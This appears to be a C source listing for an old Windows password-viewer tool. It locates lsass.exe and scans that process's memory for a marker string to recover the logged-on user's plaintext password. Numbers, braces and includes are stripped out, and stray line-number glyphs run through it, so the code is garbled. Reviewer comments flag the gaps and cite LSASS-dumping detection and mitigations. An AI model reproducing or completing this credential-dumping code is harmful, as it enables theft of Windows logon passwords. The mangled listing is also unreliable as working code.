⑴代码: //********************************************************************************
⑵// Version: V.
⑶// Coder: WinEggDrop
⑷// Date Release: //
⑸// Purpose: To Demonstrate Searching Logon User Password On Box,The Method
⑹// Used Is Pretty Unwise,But This May Be The Only Way To Review The
⑺// Logon User's Password On windows .
⑻// Test PlatForm: windows
⑼// Compiled On: VC++ .
⑽//********************************************************************************
⑾#include
⑿#include
⒀#include
// NOTE(review): this copy of the listing lost its numeric literals, braces and #include
// targets during extraction, so the constant and the initializer below are incomplete as shown.
⒁#define BaseAddress xb // Base memory address where the search starts. The author notes the password may lie before this address or far away from it, which makes the result unreliable.
⒂char Password[MAX_PATH] = ; // File-scope buffer that receives the found password; Search() clears it with ZeroMemory
⒃// Function prototype declarations
⒄//------------------------------------------------------------------------------------------------------
⒅BOOL FindPassword(DWORD PID); // called from main() with the lsass.exe PID; body is not shown in this part
⒆int Search(char *Buffer,const UINT nSize); // scans Buffer (nSize bytes) for the marker string
⒇DWORD GetLsassPID(); // main() treats a zero return as failure
⒈BOOL Is(); // platform check used by main(); NOTE(review): the name looks truncated in this copy
⒉//------------------------------------------------------------------------------------------------------
⒊// End of function prototype declarations
// Entry point: prints a banner, checks the platform with Is(), looks up the lsass.exe
// PID with GetLsassPID(), then hands that PID to FindPassword().
// Returns early when the platform check fails or when no PID is obtained.
// NOTE(review): the braces, the numeric literals and the ends of both printf strings are
// missing in this copy, so the block does not compile as shown.
// NOTE(review): the BOOL returned by FindPassword() is discarded, so the final return
// does not depend on whether the search succeeded.
// NOTE(review, defensive): the approach appears to depend on reading lsass.exe memory from
// another process. A non-system process opening lsass.exe for memory reads is a standard
// detection signal for credential theft (MITRE ATT&CK T1003.001); on current Windows,
// LSA protection (RunAsPPL) and Credential Guard are the usual mitigations.
⒋int main()
⒌DWORD PID = ;
⒍printf("windows Password Viewer V. By WinEggDrop
⒎if (!Is()) // Check Out If The Box Is
⒏printf("The Program Can't Only Run On windows Platform
⒐return -;
⒑PID = GetLsassPID(); // Get The Lsass.exe PID
⒒if (PID == ) // Fail To Get PID If Returning Zerom
⒓return -;
⒔FindPassword(PID); // Find The Password From Lsass.exe Memory
⒕return ;
⒖// End main()
⒗//------------------------------------------------------------------------------------
⒘// Purpose: Search The Memory & Try To Get The Password
⒙// Return Type: int
⒚// Parameters:
⒛// In: char *Buffer --> The Memory Buffer To Search
①// Out: const UINT nSize --> The Size Of The Memory Buffer
②// Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure",
③// Since The Password Is Near The Above Location,But It's Not Always True That
④// We Will Find The Magic String,Or Even If We Find It,The Password May Be Located
⑤// At Some Other Place.We Only Look For Luck
⑥//------------------------------------------------------------------------------------
⑦int Search(char *Buffer,const UINT nSize)
⑧UINT OffSet = ;
⑨UINT i = ;
⑩UINT j = ;
ⅠUINT Count = ;
Ⅱif (Buffer == NULL)
Ⅲreturn -;
Ⅳfor (i = ; i < nSize ; i++)
Ⅴ/* The Below Is To Find The Magic String,Why So Complicated?That Will Thank MS.The Separation From Word To Word
ⅥIs Not Separated With A Space,But With A Ending Character,So Any Search API Like strstr() Will Fail To Locate
ⅦThe Magic String,We Have To Do It Manually And Slowly
Ⅷif (Buffer == 'L')
ⅨOffSet = ;
Ⅹif (strnicmp(&Buffer[i + OffSet],"LocalSystem",strlen("LocalSystem")) == )
㈠OffSet += strlen("LocalSystem") + ;
㈡if (strnicmp(&Buffer[i + OffSet],"Remote",strlen("Remote")) == )
㈢OffSet += strlen("Remote") + ;
㈣if (strnicmp(&Buffer[i + OffSet],"Procedure",strlen("Procedure")) == )
㈤OffSet += strlen("Procedure") + ;
㈥if (strnicmp(&Buffer[i + OffSet],"Call",strlen("Call")) == )
㈦i += OffSet;
㈧if (i < nSize)
㈨ZeroMemory(Password,sizeof(Password));
㈩for (; i < nSize ; i++)